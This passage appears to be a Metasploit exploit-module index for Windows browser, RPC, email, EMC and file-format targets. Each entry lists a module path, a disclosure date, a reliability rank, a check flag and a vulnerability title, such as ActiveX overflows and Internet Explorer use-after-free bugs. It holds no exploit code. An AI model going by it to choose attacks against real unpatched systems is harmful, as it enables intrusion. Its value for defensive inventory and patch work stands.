windows/browser/adobe_shockwave_rcsl_corruption 2010-10-21 normal No Adobe Shockwave rcsL Memory Corruption - windows/browser/adobe_toolbutton 2013-08-08 normal No Adobe Reader ToolButton Use After Free - windows/browser/adobe_utilprintf 2008-02-08 good No Adobe util.printf() Buffer Overflow - windows/browser/advantech_webaccess_dvs_getcolor 2014-07-17 normal No Advantech WebAccess dvs.ocx GetColor Buffer Overflow - windows/browser/aim_goaway 2004-08-09 great No AOL Instant Messenger goaway Overflow - windows/browser/aladdin_choosefilepath_bof 2012-04-01 normal No Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow - windows/browser/amaya_bdo 2009-01-28 normal No Amaya Browser v11.0 'bdo' Tag Overflow - windows/browser/aol_ampx_convertfile 2009-05-19 normal No AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow - windows/browser/aol_icq_downloadagent 2006-11-06 excellent No America Online ICQ ActiveX Control Arbitrary File Download and Execute - windows/browser/apple_itunes_playlist 2005-01-11 normal No Apple ITunes 4.7 Playlist Buffer Overflow - windows/browser/apple_quicktime_marshaled_punk 2010-08-30 great No Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution - windows/browser/apple_quicktime_mime_type 2012-11-07 normal No Apple QuickTime 7.7.2 MIME Type Buffer Overflow - windows/browser/apple_quicktime_rdrf 2013-05-22 normal No Apple Quicktime 7 Invalid Atom Length Buffer Overflow - windows/browser/apple_quicktime_rtsp 2007-01-01 normal No Apple QuickTime 7.1.3 RTSP URI Buffer Overflow - windows/browser/apple_quicktime_smil_debug 2010-08-12 good No Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow - windows/browser/apple_quicktime_texml_font_table 2012-11-07 normal No Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow - windows/browser/ask_shortformat 2007-09-24 normal No Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow - windows/browser/asus_net4switch_ipswcom 2012-02-17 normal No ASUS Net4Switch ipswcom.dll ActiveX Stack Buffer Overflow - windows/browser/athocgov_completeinstallation 2008-02-15 normal No AtHocGov IWSAlerts ActiveX Control Buffer Overflow - windows/browser/autodesk_idrop 2009-04-02 normal No Autodesk IDrop ActiveX Control Heap Memory Corruption - windows/browser/aventail_epi_activex 2010-08-19 normal No SonicWALL Aventail epi.dll AuthCredential Format String - windows/browser/awingsoft_web3d_bof 2009-07-10 average No AwingSoft Winds3D Player SceneURL Buffer Overflow - windows/browser/awingsoft_winds3d_sceneurl 2009-11-14 excellent No AwingSoft Winds3D Player 3.5 SceneURL Download and Execute - windows/browser/baofeng_storm_onbeforevideodownload 2009-04-30 normal No BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow - windows/browser/barcode_ax49 2007-06-22 normal No RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow - windows/browser/blackice_downloadimagefileurl 2008-06-05 excellent No Black Ice Cover Page ActiveX Control Arbitrary File Download - windows/browser/c6_messenger_downloaderactivex 2008-06-03 excellent No Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute - windows/browser/ca_brightstor_addcolumn 2008-03-16 normal No CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow - windows/browser/chilkat_crypt_writefile 2008-11-03 excellent No Chilkat Crypt ActiveX WriteFile Unsafe Method - windows/browser/cisco_anyconnect_exec 2011-06-01 excellent No Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute - windows/browser/cisco_playerpt_setsource 2012-03-22 normal No Cisco Linksys PlayerPT ActiveX Control Buffer Overflow - windows/browser/cisco_playerpt_setsource_surl 2012-07-17 normal No Cisco Linksys PlayerPT ActiveX Control SetSource sURL Argument Buffer Overflow - windows/browser/cisco_webex_ext 2017-01-21 great No Cisco WebEx Chrome Extension RCE (CVE-2017-3823) - windows/browser/citrix_gateway_actx 2011-07-14 normal No Citrix Gateway ActiveX Control Stack Based Buffer Overflow Vulnerability - windows/browser/clear_quest_cqole 2012-05-19 normal No IBM Rational ClearQuest CQOle Remote Code Execution - windows/browser/communicrypt_mail_activex 2010-05-19 great No CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow - windows/browser/creative_software_cachefolder 2008-05-28 normal No Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow - windows/browser/crystal_reports_printcontrol 2010-12-14 normal No Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow - windows/browser/dell_webcam_crazytalk 2012-03-19 normal No Dell Webcam CrazyTalk ActiveX BackImage Vulnerability - windows/browser/dxstudio_player_exec 2009-06-09 excellent No Worldweaver DX Studio Player shell.execute() Command Execution - windows/browser/ea_checkrequirements 2007-10-08 normal No Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow - windows/browser/ebook_flipviewer_fviewerloading 2007-06-06 normal No FlipViewer FViewerLoading ActiveX Control Buffer Overflow - windows/browser/enjoysapgui_comp_download 2009-04-15 excellent No EnjoySAP SAP GUI ActiveX Control Arbitrary File Download - windows/browser/enjoysapgui_preparetoposthtml 2007-07-05 normal No EnjoySAP SAP GUI ActiveX Control Buffer Overflow - windows/browser/exodus 2018-01-25 manual No Exodus Wallet (ElectronJS Framework) remote Code Execution - windows/browser/facebook_extractiptc 2008-01-31 normal No Facebook Photo Uploader 4 ActiveX Control Buffer Overflow - windows/browser/firefox_smil_uaf 2016-11-30 normal No Firefox nsSMILTimeContainer::NotifyTimeChange() RCE - windows/browser/foxit_reader_plugin_url_bof 2013-01-07 normal No Foxit Reader Plugin URL Processing Buffer Overflow - windows/browser/getgodm_http_response_bof 2014-03-09 normal No GetGo Download Manager HTTP Response Buffer Overflow - windows/browser/gom_openurl 2007-10-27 normal No GOM Player ActiveX Control Buffer Overflow - windows/browser/greendam_url 2009-06-11 normal No Green Dam URL Processing Buffer Overflow - windows/browser/honeywell_hscremotedeploy_exec 2013-02-22 excellent No Honeywell HSC Remote Deployer ActiveX Remote Code Execution - windows/browser/honeywell_tema_exec 2011-10-20 excellent No Honeywell Tema Remote Installer ActiveX Remote Code Execution - windows/browser/hp_alm_xgo_setshapenodetype_exec 2012-08-29 normal No HP Application Lifecycle Management XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution - windows/browser/hp_easy_printer_care_xmlcachemgr 2012-01-11 great No HP Easy Printer Care XMLCacheMgr Class ActiveX Control Remote Code Execution - windows/browser/hp_easy_printer_care_xmlsimpleaccessor 2011-08-16 great No HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Remote Code Execution - windows/browser/hp_loadrunner_addfile 2008-01-25 normal No Persits XUpload ActiveX AddFile Buffer Overflow - windows/browser/hp_loadrunner_addfolder 2007-12-25 good No HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow - windows/browser/hp_loadrunner_writefilebinary 2013-07-24 normal No HP LoadRunner lrFileIOService ActiveX Remote Code Execution - windows/browser/hp_loadrunner_writefilestring 2013-07-24 normal No HP LoadRunner lrFileIOService ActiveX WriteFileString Remote Code Execution - windows/browser/hpmqc_progcolor 2007-04-04 normal No HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow - windows/browser/hyleos_chemviewx_activex 2010-02-10 good No Hyleos ChemView ActiveX Control Stack Buffer Overflow - windows/browser/ibm_spss_c1sizer 2013-04-26 normal No IBM SPSS SamplePower C1Tab ActiveX Heap Overflow - windows/browser/ibm_tivoli_pme_activex_bof 2012-03-01 normal No IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 ActiveX RunAndUploadFile() Method Overflow - windows/browser/ibmegath_getxmlvalue 2009-03-24 normal No IBM Access Support ActiveX Control Buffer Overflow - windows/browser/ibmlotusdomino_dwa_uploadmodule 2007-12-20 normal No IBM Lotus Domino Web Access Upload Module Buffer Overflow - windows/browser/ie_cbutton_uaf 2012-12-27 normal No MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability - windows/browser/ie_cgenericelement_uaf 2013-05-03 good No MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability - windows/browser/ie_createobject 2006-04-11 excellent No MS06-014 Microsoft Internet Explorer COM CreateObject Code Execution - windows/browser/ie_execcommand_uaf 2012-09-14 good No MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability - windows/browser/ie_iscomponentinstalled 2006-02-24 normal No Microsoft Internet Explorer isComponentInstalled Overflow - windows/browser/ie_setmousecapture_uaf 2013-09-17 normal No MS13-080 Microsoft Internet Explorer SetMouseCapture Use-After-Free - windows/browser/ie_unsafe_scripting 2010-09-20 manual No Microsoft Internet Explorer Unsafe Scripting Misconfiguration - windows/browser/imgeviewer_tifmergemultifiles 2010-03-03 normal No Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control - windows/browser/indusoft_issymbol_internationalseparator 2012-04-28 normal No InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow - windows/browser/inotes_dwa85w_bof 2012-06-01 normal No IBM Lotus iNotes dwa85W ActiveX Buffer Overflow - windows/browser/intrust_annotatex_add 2012-03-28 average No Quest InTrust Annotation Objects Uninitialized Pointer - windows/browser/java_basicservice_impl 2010-10-12 excellent No Sun Java Web Start BasicServiceImpl Code Execution - windows/browser/java_cmm 2013-03-01 normal No Java CMM Remote Code Execution - windows/browser/java_codebase_trust 2011-02-15 excellent No Sun Java Applet2ClassLoader Remote Code Execution - windows/browser/java_docbase_bof 2010-10-12 great No Sun Java Runtime New Plugin docbase Buffer Overflow - windows/browser/java_mixer_sequencer 2010-03-30 great No Java MixerSequencer Object GM_Song Structure Handling Vulnerability - windows/browser/java_ws_arginject_altjvm 2010-04-09 excellent No Sun Java Web Start Plugin Command Line Argument Injection - windows/browser/java_ws_double_quote 2012-10-16 excellent No Sun Java Web Start Double Quote Injection - windows/browser/java_ws_vmargs 2012-02-14 excellent No Sun Java Web Start Plugin Command Line Argument Injection - windows/browser/juniper_sslvpn_ive_setupdll 2006-04-26 normal No Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow - windows/browser/kazaa_altnet_heap 2007-10-03 normal No Kazaa Altnet Download Manager ActiveX Control Buffer Overflow - windows/browser/keyhelp_launchtripane_exec 2012-06-26 excellent No KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability - windows/browser/logitechvideocall_start 2007-05-31 normal No Logitech VideoCall ActiveX Control Buffer Overflow - windows/browser/lpviewer_url 2008-10-06 normal No iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow - windows/browser/macrovision_downloadandexecute 2007-10-31 normal No Macrovision InstallShield Update Service Buffer Overflow - windows/browser/macrovision_unsafe 2007-10-20 excellent No Macrovision InstallShield Update Service ActiveX Unsafe Method - windows/browser/malwarebytes_update_exec 2014-12-16 good No Malwarebytes Anti-Malware and Anti-Exploit Update Remote Code Execution - windows/browser/maxthon_history_xcs 2012-11-26 excellent No Maxthon3 about:history XCS Trusted Zone Code Execution - windows/browser/mcafee_mcsubmgr_vsprintf 2006-08-01 normal No McAfee Subscription Manager Stack Buffer Overflow - windows/browser/mcafee_mvt_exec 2012-04-30 excellent No McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability - windows/browser/mcafeevisualtrace_tracetarget 2007-07-07 normal No McAfee Visual Trace ActiveX Control Buffer Overflow - windows/browser/mirc_irc_url 2003-10-13 normal No mIRC IRC URL Buffer Overflow - windows/browser/mozilla_attribchildremoved 2011-12-06 average No Firefox 8/9 AttributeChildRemoved() Use-After-Free - windows/browser/mozilla_firefox_onreadystatechange 2013-06-25 normal No Firefox onreadystatechange Event DocumentViewerImpl Use After Free - windows/browser/mozilla_firefox_xmlserializer 2013-01-08 normal No Firefox XMLSerializer Use After Free - windows/browser/mozilla_interleaved_write 2010-10-25 normal No Mozilla Firefox Interleaved document.write/appendChild Memory Corruption - windows/browser/mozilla_mchannel 2011-05-10 normal No Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability - windows/browser/mozilla_nssvgvalue 2011-12-06 average No Firefox nsSVGValue Out-of-Bounds Access Vulnerability - windows/browser/mozilla_nstreerange 2011-02-02 normal No Mozilla Firefox "nsTreeRange" Dangling Pointer Vulnerability - windows/browser/mozilla_reduceright 2011-06-21 normal No Mozilla Firefox Array.reduceRight() Integer Overflow - windows/browser/ms03_020_ie_objecttype 2003-06-04 normal No MS03-020 Microsoft Internet Explorer Object Type - windows/browser/ms05_054_onload 2005-11-21 normal No MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution - windows/browser/ms06_001_wmf_setabortproc 2005-12-27 great No Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution - windows/browser/ms06_013_createtextrange 2006-03-19 normal No MS06-013 Microsoft Internet Explorer createTextRange() Code Execution - windows/browser/ms06_055_vml_method 2006-09-19 normal No MS06-055 Microsoft Internet Explorer VML Fill Method Code Execution - windows/browser/ms06_057_webview_setslice 2006-07-17 normal No MS06-057 Microsoft Internet Explorer WebViewFolderIcon setSlice() Overflow - windows/browser/ms06_067_keyframe 2006-11-14 normal No MS06-067 Microsoft Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability - windows/browser/ms06_071_xml_core 2006-10-10 normal No MS06-071 Microsoft Internet Explorer XML Core Services HTTP Request Handling - windows/browser/ms07_017_ani_loadimage_chunksize 2007-03-28 great No Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) - windows/browser/ms08_041_snapshotviewer 2008-07-07 excellent No Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download - windows/browser/ms08_053_mediaencoder 2008-09-09 normal No Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow - windows/browser/ms08_070_visual_studio_msmask 2008-08-13 normal No Microsoft Visual Studio Mdmask32.ocx ActiveX Buffer Overflow - windows/browser/ms08_078_xml_corruption 2008-12-07 normal No MS08-078 Microsoft Internet Explorer Data Binding Memory Corruption - windows/browser/ms09_002_memory_corruption 2009-02-10 normal No MS09-002 Microsoft Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption - windows/browser/ms09_043_owc_htmlurl 2009-08-11 normal No Microsoft OWC Spreadsheet HTMLURL Buffer Overflow - windows/browser/ms09_043_owc_msdso 2009-07-13 normal No Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption - windows/browser/ms09_072_style_object 2009-11-20 normal No MS09-072 Microsoft Internet Explorer Style getElementsByTagName Memory Corruption - windows/browser/ms10_002_aurora 2010-01-14 normal No MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption - windows/browser/ms10_002_ie_object 2010-01-21 normal No MS10-002 Microsoft Internet Explorer Object Memory Use-After-Free - windows/browser/ms10_018_ie_behaviors 2010-03-09 good No MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free - windows/browser/ms10_018_ie_tabular_activex 2010-03-09 good No MS10-018 Microsoft Internet Explorer Tabular Data Control ActiveX Memory Corruption - windows/browser/ms10_022_ie_vbscript_winhlp32 2010-02-26 great No MS10-022 Microsoft Internet Explorer Winhlp32.exe MsgBox Code Execution - windows/browser/ms10_026_avi_nsamplespersec 2010-04-13 normal No MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow - windows/browser/ms10_042_helpctr_xss_cmd_exec 2010-06-09 excellent No Microsoft Help Center XSS and Command Execution - windows/browser/ms10_046_shortcut_icon_dllloader 2010-07-16 excellent No Microsoft Windows Shell LNK Code Execution - windows/browser/ms10_090_ie_css_clip 2010-11-03 good No MS10-090 Microsoft Internet Explorer CSS SetUserClip Memory Corruption - windows/browser/ms11_003_ie_css_import 2010-11-29 good No MS11-003 Microsoft Internet Explorer CSS Recursive Import Use After Free - windows/browser/ms11_050_mshtml_cobjectelement 2011-06-16 normal No MS11-050 IE mshtml!CObjectElement Use After Free - windows/browser/ms11_081_option 2012-10-11 normal No MS11-081 Microsoft Internet Explorer Option Element Use-After-Free - windows/browser/ms11_093_ole32 2011-12-13 normal No MS11-093 Microsoft Windows OLE Object File Handling Remote Code Execution - windows/browser/ms12_004_midi 2012-01-10 normal No MS12-004 midiOutPlayNextPolyEvent Heap Overflow - windows/browser/ms12_037_ie_colspan 2012-06-12 normal No MS12-037 Microsoft Internet Explorer Fixed Table Col Span Heap Overflow - windows/browser/ms12_037_same_id 2012-06-12 normal No MS12-037 Microsoft Internet Explorer Same ID Property Deleted Object Handling Memory Corruption - windows/browser/ms13_009_ie_slayoutrun_uaf 2013-02-13 average No MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free - windows/browser/ms13_022_silverlight_script_object 2013-03-12 normal No MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access - windows/browser/ms13_037_svg_dashstyle 2013-03-06 normal No MS13-037 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow - windows/browser/ms13_055_canchor 2013-07-09 normal No MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free - windows/browser/ms13_059_cflatmarkuppointer 2013-06-27 normal No MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free - windows/browser/ms13_069_caret 2013-09-10 normal No MS13-069 Microsoft Internet Explorer CCaret Use-After-Free - windows/browser/ms13_080_cdisplaypointer 2013-10-08 normal No MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free - windows/browser/ms13_090_cardspacesigninhelper 2013-11-08 normal No MS13-090 CardSpaceClaimCollection ActiveX Integer Underflow - windows/browser/ms14_012_cmarkup_uaf 2014-02-13 normal No MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free - windows/browser/ms14_012_textrange 2014-03-11 normal No MS14-012 Microsoft Internet Explorer TextRange Use-After-Free - windows/browser/ms14_064_ole_code_execution 2014-11-13 good No MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution - windows/browser/ms16_051_vbscript 2016-05-10 normal No Internet Explorer 11 VBScript Engine Memory Corruption - windows/browser/msvidctl_mpeg2 2009-07-05 normal No Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption - windows/browser/mswhale_checkforupdates 2009-04-15 normal No Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow - windows/browser/msxml_get_definition_code_exec 2012-06-12 good No MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption - windows/browser/nctaudiofile2_setformatlikesample 2007-01-24 normal No NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow - windows/browser/nis2004_antispam 2004-03-19 normal No Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow - windows/browser/nis2004_get 2007-05-16 normal No Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow - windows/browser/notes_handler_cmdinject 2012-06-18 excellent No IBM Lotus Notes Client URL Handler Command Injection - windows/browser/novell_groupwise_gwcls1_actvx 2013-01-30 normal No Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution - windows/browser/novelliprint_callbackurl 2010-08-20 normal No Novell iPrint Client ActiveX Control call-back-url Buffer Overflow - windows/browser/novelliprint_datetime 2009-12-08 great No Novell iPrint Client ActiveX Control Date/Time Buffer Overflow - windows/browser/novelliprint_executerequest 2008-02-22 normal No Novell iPrint Client ActiveX Control ExecuteRequest Buffer Overflow - windows/browser/novelliprint_executerequest_dbg 2010-08-04 normal No Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow - windows/browser/novelliprint_getdriversettings 2008-06-16 normal No Novell iPrint Client ActiveX Control Buffer Overflow - windows/browser/novelliprint_getdriversettings_2 2010-11-15 normal No Novell iPrint Client ActiveX Control Buffer Overflow - windows/browser/novelliprint_target_frame 2009-12-08 great No Novell iPrint Client ActiveX Control target-frame Buffer Overflow - windows/browser/ntr_activex_check_bof 2012-01-11 normal No NTR ActiveX Control Check() Method Buffer Overflow - windows/browser/ntr_activex_stopmodule 2012-01-11 normal No NTR ActiveX Control StopModule() Remote Code Execution - windows/browser/oracle_autovue_setmarkupmode 2012-04-18 normal No Oracle AutoVue ActiveX Control SetMarkupMode Buffer Overflow - windows/browser/oracle_dc_submittoexpress 2009-08-28 normal No Oracle Document Capture 10g ActiveX Control Buffer Overflow - windows/browser/oracle_webcenter_checkoutandopen 2013-04-16 excellent No Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution - windows/browser/orbit_connecting 2009-02-03 normal No Orbit Downloader Connecting Log Creation Buffer Overflow - windows/browser/ovftool_format_string 2012-11-08 normal No VMWare OVF Tools Format String Vulnerability - windows/browser/pcvue_func 2011-10-05 average No PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability - windows/browser/persits_xupload_traversal 2009-09-29 excellent No Persits XUpload ActiveX MakeHttpRequest Directory Traversal - windows/browser/quickr_qp2_bof 2012-05-23 normal No IBM Lotus QuickR qp2 ActiveX Buffer Overflow - windows/browser/real_arcade_installerdlg 2011-04-03 normal No Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution - windows/browser/realplayer_cdda_uri 2010-11-15 normal No RealNetworks RealPlayer CDDA URI Initialization Vulnerability - windows/browser/realplayer_console 2008-03-08 normal No RealPlayer rmoc3260.dll ActiveX Control Heap Corruption - windows/browser/realplayer_import 2007-10-18 normal No RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow - windows/browser/realplayer_qcp 2011-08-16 average No RealNetworks Realplayer QCP Parsing Heap Overflow - windows/browser/realplayer_smil 2005-03-01 normal No RealNetworks RealPlayer SMIL Buffer Overflow - windows/browser/roxio_cineplayer 2007-04-11 normal No Roxio CinePlayer ActiveX Control Buffer Overflow - windows/browser/safari_xslt_output 2011-07-20 excellent No Apple Safari Webkit libxslt Arbitrary File Creation - windows/browser/samsung_neti_wiewer_backuptoavi_bof 2012-04-21 normal No Samsung NET-i Viewer Multiple ActiveX BackupToAvi() Remote Overflow - windows/browser/samsung_security_manager_put 2016-08-05 excellent No Samsung Security Manager 1.4 ActiveMQ Broker Service PUT Method Remote Code Execution - windows/browser/sapgui_saveviewtosessionfile 2009-03-31 normal No SAP AG SAPgui EAI WebViewer3D Buffer Overflow - windows/browser/siemens_solid_edge_selistctrlx 2013-05-26 normal No Siemens Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution - windows/browser/softartisans_getdrivename 2008-08-25 normal No SoftArtisans XFile FileManager ActiveX Control Buffer Overflow - windows/browser/sonicwall_addrouteentry 2007-11-01 normal No SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow - windows/browser/symantec_altirisdeployment_downloadandinstall 2009-09-09 excellent No Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute - windows/browser/symantec_altirisdeployment_runcmd 2009-11-04 normal No Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow - windows/browser/symantec_appstream_unsafe 2009-01-15 excellent No Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute - windows/browser/symantec_backupexec_pvcalendar 2008-02-28 normal No Symantec BackupExec Calendar Control Buffer Overflow - windows/browser/symantec_consoleutilities_browseandsavefile 2009-11-02 normal No Symantec ConsoleUtilities ActiveX Control Buffer Overflow - windows/browser/synactis_connecttosynactis_bof 2013-05-30 normal No Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow - windows/browser/systemrequirementslab_unsafe 2008-10-16 excellent No Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method - windows/browser/teechart_pro 2011-08-11 normal No TeeChart Professional ActiveX Control Trusted Integer Dereference - windows/browser/tom_sawyer_tsgetx71ex552 2011-05-03 normal No Tom Sawyer Software GET Extension Factory Remote Code Execution - windows/browser/trendmicro_extsetowner 2010-08-25 normal No Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution - windows/browser/trendmicro_officescan 2007-02-12 normal No Trend Micro OfficeScan Client ActiveX Control Buffer Overflow - windows/browser/tumbleweed_filetransfer 2008-04-07 great No Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow - windows/browser/ubisoft_uplay_cmd_exec 2012-07-29 normal No Ubisoft uplay 2.0.3 ActiveX Control Arbitrary Code Execution - windows/browser/ultramjcam_openfiledig_bof 2012-03-28 normal No TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow - windows/browser/ultraoffice_httpupload 2008-08-27 good No Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow - windows/browser/verypdf_pdfview 2008-06-16 normal No VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow - windows/browser/viscom_movieplayer_drawtext 2010-01-12 normal No Viscom Software Movie Player Pro SDK ActiveX 6.8 - windows/browser/vlc_amv 2011-03-23 good No VLC AMV Dangling Pointer Vulnerability - windows/browser/vlc_mms_bof 2012-03-15 normal No VLC MMS Stream Handling Buffer Overflow - windows/browser/webdav_dll_hijacker 2010-08-18 manual No WebDAV Application DLL Hijacker - windows/browser/webex_ucf_newobject 2008-08-06 good No WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow - windows/browser/wellintech_kingscada_kxclientdownload 2014-01-14 good No KingScada kxClientDownload.ocx ActiveX Remote Code Execution - windows/browser/winamp_playlist_unc 2006-01-29 great No Winamp Playlist UNC Path Computer Name Overflow - windows/browser/winamp_ultravox 2008-01-18 normal No Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow - windows/browser/windvd7_applicationtype 2007-03-20 normal No WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow - windows/browser/winzip_fileview 2007-11-02 normal No WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow - windows/browser/wmi_admintools 2010-12-21 great No Microsoft WMI Administration Tools ActiveX Buffer Overflow - windows/browser/x360_video_player_set_text_bof 2015-01-30 normal No X360 VideoPlayer ActiveX Control Buffer Overflow - windows/browser/xmplay_asx 2006-11-21 good No XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow - windows/browser/yahoomessenger_fvcom 2007-08-30 normal No Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow - windows/browser/yahoomessenger_server 2007-06-05 good No Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow - windows/browser/zenturiprogramchecker_unsafe 2007-05-29 excellent No Zenturi ProgramChecker ActiveX Control Arbitrary File Download - windows/browser/zenworks_helplauncher_exec 2011-10-19 normal No AdminStudio LaunchHelp.dll ActiveX Arbitrary Code Execution - windows/dcerpc/ms03_026_dcom 2003-07-16 great No MS03-026 Microsoft RPC DCOM Interface Overflow - windows/dcerpc/ms05_017_msmq 2005-04-12 good No MS05-017 Microsoft Message Queueing Service Path Overflow - windows/dcerpc/ms07_029_msdns_zonename 2007-04-12 great No MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP) - windows/dcerpc/ms07_065_msmq 2007-12-11 good No MS07-065 Microsoft Message Queueing Service DNS Name Path Overflow - windows/email/ms07_017_ani_loadimage_chunksize 2007-03-28 great No Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP) - windows/email/ms10_045_outlook_ref_only 2010-06-01 excellent No Outlook ATTACH_BY_REF_ONLY File Execution - windows/email/ms10_045_outlook_ref_resolve 2010-06-01 excellent No Outlook ATTACH_BY_REF_RESOLVE File Execution - windows/emc/alphastor_agent 2008-05-27 great No EMC AlphaStor Agent Buffer Overflow - windows/emc/alphastor_device_manager_exec 2013-01-18 excellent Yes EMC AlphaStor Device Manager Opcode 0x75 Command Injection - windows/emc/networker_format_string 2012-08-29 normal No EMC Networker Format String - windows/emc/replication_manager_exec 2011-02-07 great No EMC Replication Manager Command Execution - windows/fileformat/a_pdf_wav_to_mp3 2010-08-17 normal No A-PDF WAV to MP3 v1.0.0 Buffer Overflow - windows/fileformat/abbs_amp_lst 2013-06-30 normal No ABBS Audio Media Player .LST Buffer Overflow - windows/fileformat/acdsee_fotoslate_string 2011-09-12 good No ACDSee FotoSlate PLP File id Parameter Overflow - windows/fileformat/acdsee_xpm 2007-11-23 good No ACDSee XPM File Section Buffer Overflow - windows/fileformat/actfax_import_users_bof 2012-08-28 normal No ActiveFax (ActFax) 4.3 Client Importer Buffer Overflow - windows/fileformat/activepdf_webgrabber 2008-08-26 low No activePDF WebGrabber ActiveX Control Buffer Overflow - windows/fileformat/adobe_collectemailinfo 2008-02-08 good No Adobe Collab.collectEmailInfo() Buffer Overflow - windows/fileformat/adobe_cooltype_sing 2010-09-07 great No Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow - windows/fileformat/adobe_flashplayer_button 2010-10-28 normal No Adobe Flash Player "Button" Remote Code Execution - windows/fileformat/adobe_flashplayer_newfunction 2010-06-04 normal No Adobe Flash Player "newfunction" Invalid Pointer Use - windows/fileformat/adobe_flatedecode_predictor02 2009-10-08 good No Adobe FlateDecode Stream Predictor 02 Integer Overflow - windows/fileformat/adobe_geticon 2009-03-24 good No Adobe Collab.getIcon() Buffer Overflow - windows/fileformat/adobe_illustrator_v14_eps 2009-12-03 great No Adobe Illustrator CS4 v14.0.0 - windows/fileformat/adobe_jbig2decode 2009-02-19 good No Adobe JBIG2Decode Memory Corruption - windows/fileformat/adobe_libtiff 2010-02-16 good No Adobe Acrobat Bundled LibTIFF Integer Overflow - windows/fileformat/adobe_media_newplayer 2009-12-14 good No Adobe Doc.media.newPlayer Use After Free Vulnerability - windows/fileformat/adobe_pdf_embedded_exe 2010-03-29 excellent No Adobe PDF Embedded EXE Social Engineering - windows/fileformat/adobe_pdf_embedded_exe_nojs 2010-03-29 excellent No Adobe PDF Escape EXE Social Engineering (No JavaScript) - windows/fileformat/adobe_reader_u3d 2011-12-06 average No Adobe Reader U3D Memory Corruption Vulnerability - windows/fileformat/adobe_toolbutton 2013-08-08 normal No Adobe Reader ToolButton 